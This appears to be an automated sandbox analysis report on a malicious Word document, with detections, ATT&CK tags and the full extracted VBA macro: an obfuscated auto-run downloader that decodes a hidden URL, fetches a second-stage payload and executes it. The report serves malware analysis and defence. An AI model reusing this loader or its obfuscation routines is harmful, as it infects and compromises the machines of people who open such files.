MALICIOUS
360
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
T1071.001 Web Protocols
The sample contains obfuscated VBA macros that execute upon opening the document. These macros utilize the URLDownloadToFileA API to download a second-stage payload from a hardcoded URL and then execute it using CreateObject. This indicates a downloader or droppper functionality.
Heuristics 11
-
ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
-
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOADReference to URLDownloadToFile API
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
Attribute VB_Customizable = True Private Declare PtrSafe Function URLDownloadToFileA Lib "URLMON" (ByVal BBeeSTqvZt4Ti6St2 As Long, ByVal cjta0 As String, ByVal G4yK6lV2qBRx As String, ByVal XefOrirtIJuwmv2Z As Long, ByVal CTB9ON As Long) As LongPtr Sub Document_Open() -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
hGxsDgQQfRCA4d = URLDownloadToFileA(0, P6OcuF, dpXyOdLN5Xk7rX, 0, 0) Set p3lzLi85AKeDJ3Fx = CreateObject(MCk5jNez(jES4Wyj0("DE57632A0E4D6", "55CEED9673E98"), Fg2oaYYH("p8e", "nM9P"))) p3lzLi85AKeDJ3Fx.Run dpXyOdLN5Xk7rX -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
hGxsDgQQfRCA4d = URLDownloadToFileA(0, P6OcuF, dpXyOdLN5Xk7rX, 0, 0) Set p3lzLi85AKeDJ3Fx = CreateObject(MCk5jNez(jES4Wyj0("DE57632A0E4D6", "55CEED9673E98"), Fg2oaYYH("p8e", "nM9P"))) p3lzLi85AKeDJ3Fx.Run dpXyOdLN5Xk7rX -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Declare PtrSafe Function URLDownloadToFileA Lib "URLMON" (ByVal BBeeSTqvZt4Ti6St2 As Long, ByVal cjta0 As String, ByVal G4yK6lV2qBRx As String, ByVal XefOrirtIJuwmv2Z As Long, ByVal CTB9ON As Long) As LongPtr Sub Document_Open() Hz9nTLRgw -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Dim p3lzLi85AKeDJ3Fx dpXyOdLN5Xk7rX = Environ(MCk5jNez(FWjFM37eg("66C1", "24BE"), rSdI2XFZR8T("vw", "oV0"))) + dyVR7("\)62Tt2YMAg(hpUnWThxyzV,ou/x<vqLgqN.s^_1eEX@cxZ[qWeCOsc") P6OcuF = dyVR7("h:JMftNOuWtfOh9pi8W_smt@,:KcbB/0Qai/(2jnvyhG)e*kk]r=Ma3siBCVe\oPxr?M)Uvf2^{il4W\cdy>)eoV]*s1bn}.*WXmc6357o`pWTmfqAw/4no1it-Mom,Af-g:Mn[/^+S6aXpm`k}HzscIiA}k<dtB3rd0{.2hhseL/{;x)zubeE2FC") -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4674 bytes |
SHA-256: 8161f102046c7caf14d3f29e4c90e7d20c6a1fb79708521ce492dd2a802828b9 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
45 of 88 identifiers look randomly generated (e.g. 'JMftNOuWtfOh9pi8W_smt') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare PtrSafe Function URLDownloadToFileA Lib "URLMON" (ByVal BBeeSTqvZt4Ti6St2 As Long, ByVal cjta0 As String, ByVal G4yK6lV2qBRx As String, ByVal XefOrirtIJuwmv2Z As Long, ByVal CTB9ON As Long) As LongPtr
Sub Document_Open()
Hz9nTLRgw
End Sub
Sub Hz9nTLRgw()
Dim P6OcuF
Dim hGxsDgQQfRCA4d
Dim dpXyOdLN5Xk7rX
Dim p3lzLi85AKeDJ3Fx
dpXyOdLN5Xk7rX = Environ(MCk5jNez(FWjFM37eg("66C1", "24BE"), rSdI2XFZR8T("vw", "oV0"))) + dyVR7("\)62Tt2YMAg(hpUnWThxyzV,ou/x<vqLgqN.s^_1eEX@cxZ[qWeCOsc")
P6OcuF = dyVR7("h:JMftNOuWtfOh9pi8W_smt@,:KcbB/0Qai/(2jnvyhG)e*kk]r=Ma3siBCVe\oPxr?M)Uvf2^{il4W\cdy>)eoV]*s1bn}.*WXmc6357o`pWTmfqAw/4no1it-Mom,Af-g:Mn[/^+S6aXpm`k}HzscIiA}k<dtB3rd0{.2hhseL/{;x)zubeE2FC")
hGxsDgQQfRCA4d = URLDownloadToFileA(0, P6OcuF, dpXyOdLN5Xk7rX, 0, 0)
Set p3lzLi85AKeDJ3Fx = CreateObject(MCk5jNez(jES4Wyj0("DE57632A0E4D6", "55CEED9673E98"), Fg2oaYYH("p8e", "nM9P")))
p3lzLi85AKeDJ3Fx.Run dpXyOdLN5Xk7rX
End Sub
Private Function MCk5jNez(l6iMNaGqPG As String, KLvOqFHtiFY As String) As String
On Error Resume Next
Dim lTkmM(0 To 255) As Byte
Dim GNwtrKSYY(0 To 255) As Byte
Dim tb9O4HuUkNekQ1Jqah As Byte
Dim OmzSlVcPoG As Long
Dim hl5KQR6YxTYF2zdV As Long
Dim OmzSlVcPoGdx As Long
Dim prk1kspXxT8zeTE As String
Dim zwZuFXIj As String
Dim UbS12KlpsKiGj0K As Long
For UbS12KlpsKiGj0K = 1 To Len(l6iMNaGqPG) Step 2
prk1kspXxT8zeTE = Chr$(Val(b9UY4DO("&", "H") & Mid$(l6iMNaGqPG, UbS12KlpsKiGj0K, 2)))
zwZuFXIj = zwZuFXIj & prk1kspXxT8zeTE
Next UbS12KlpsKiGj0K
l6iMNaGqPG = zwZuFXIj
For OmzSlVcPoGdx = 0 To 255
lTkmM(OmzSlVcPoGdx) = OmzSlVcPoGdx
GNwtrKSYY(OmzSlVcPoGdx) = Asc(Mid$(KLvOqFHtiFY, 1 + (OmzSlVcPoGdx Mod Len(KLvOqFHtiFY)), 1))
Next
For OmzSlVcPoG = 0 To 255
hl5KQR6YxTYF2zdV = (hl5KQR6YxTYF2zdV + lTkmM(OmzSlVcPoG) + GNwtrKSYY(OmzSlVcPoG)) Mod 256
tb9O4HuUkNekQ1Jqah = lTkmM(OmzSlVcPoG)
lTkmM(OmzSlVcPoG) = lTkmM(hl5KQR6YxTYF2zdV)
lTkmM(hl5KQR6YxTYF2zdV) = tb9O4HuUkNekQ1Jqah
Next
OmzSlVcPoG = 0
hl5KQR6YxTYF2zdV = 0
For OmzSlVcPoGdx = 1 To Len(l6iMNaGqPG)
OmzSlVcPoG = (OmzSlVcPoG + 1) Mod 256
hl5KQR6YxTYF2zdV = (hl5KQR6YxTYF2zdV + lTkmM(OmzSlVcPoG)) Mod 256
tb9O4HuUkNekQ1Jqah = lTkmM(OmzSlVcPoG)
lTkmM(OmzSlVcPoG) = lTkmM(hl5KQR6YxTYF2zdV)
lTkmM(hl5KQR6YxTYF2zdV) = tb9O4HuUkNekQ1Jqah
MCk5jNez = MCk5jNez & Chr$((vs8i4ov(lTkmM((CLng(lTkmM(OmzSlVcPoG)) + lTkmM(hl5KQR6YxTYF2zdV)) Mod 256), Asc(Mid$(l6iMNaGqPG, OmzSlVcPoGdx, 1)))))
Next
End Function
Private Function vs8i4ov(ByVal OmzSlVcPoG As Long, ByVal hl5KQR6YxTYF2zdV As Long) As Long
On Error Resume Next
If OmzSlVcPoG = hl5KQR6YxTYF2zdV Then
vs8i4ov = hl5KQR6YxTYF2zdV
Else
vs8i4ov = OmzSlVcPoG Xor hl5KQR6YxTYF2zdV
End If
End Function
Function eXbnDKMvOhj(Hfr9620sTYhaxpLYEo As String, bjNjfg5VkxuB3Ws3A6 As String)
eXbnDKMvOhj = Hfr9620sTYhaxpLYEo + bjNjfg5VkxuB3Ws3A6
End Function
Function PDOCte(KaZnFX As String, rhpiC8f As String)
PDOCte = KaZnFX + rhpiC8f
End Function
Function FWjFM37eg(kAtwCT0WGuYNe45mB As String, MH1w8BVoNf2 As String)
FWjFM37eg = kAtwCT0WGuYNe45mB + MH1w8BVoNf2
End Function
Function rSdI2XFZR8T(lVCli9DueJ4JtgAV As String, c3Wk2BZjEklgedrE9 As String)
rSdI2XFZR8T = lVCli9DueJ4JtgAV + c3Wk2BZjEklgedrE9
End Function
Function jES4Wyj0(rRINcxXRADh2S000l As String, V1iKd2TPSDzgD5 As String)
jES4Wyj0 = rRINcxXRADh2S000l + V1iKd2TPSDzgD5
End Function
Function Fg2oaYYH(sI4UFQYCb0L1BHkg As String, sEi75WnGtDVKRU As String)
Fg2oaYYH = sI4UFQYCb0L1BHkg + sEi75WnGtDVKRU
End Function
Function b9UY4DO(cIahv As String, VCwo6JI0I7hW As String)
b9UY4DO = cIahv + VCwo6JI0I7hW
End Function
Function dyVR7(oyMcmlHEMD As String) As String
Dim YwfEtoOry0(1055) As Byte
Dim Jkq3Y1LFGMVu8N9() As Byte
Dim nzFwEZgadUlgCb32
Dim S51G9FNk4y31Wr
Jkq3Y1LFGMVu8N9 = StrConv(oyMcmlHEMD, vbFromUnicode)
For S51G9FNk4y31Wr = 0 To UBound(Jkq3Y1LFGMVu8N9) - 1
If (S51G9FNk4y31Wr Mod 5 = 0) Then
YwfEtoOry0(nzFwEZgadUlgCb32) = Jkq3Y1LFGMVu8N9(S51G9FNk4y31Wr)
nzFwEZgadUlgCb32 = nzFwEZgadUlgCb32 + 1
End If
Next S51G9FNk4y31Wr
dyVR7 = Left(StrConv(YwfEtoOry0, vbUnicode), nzFwEZgadUlgCb32)
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.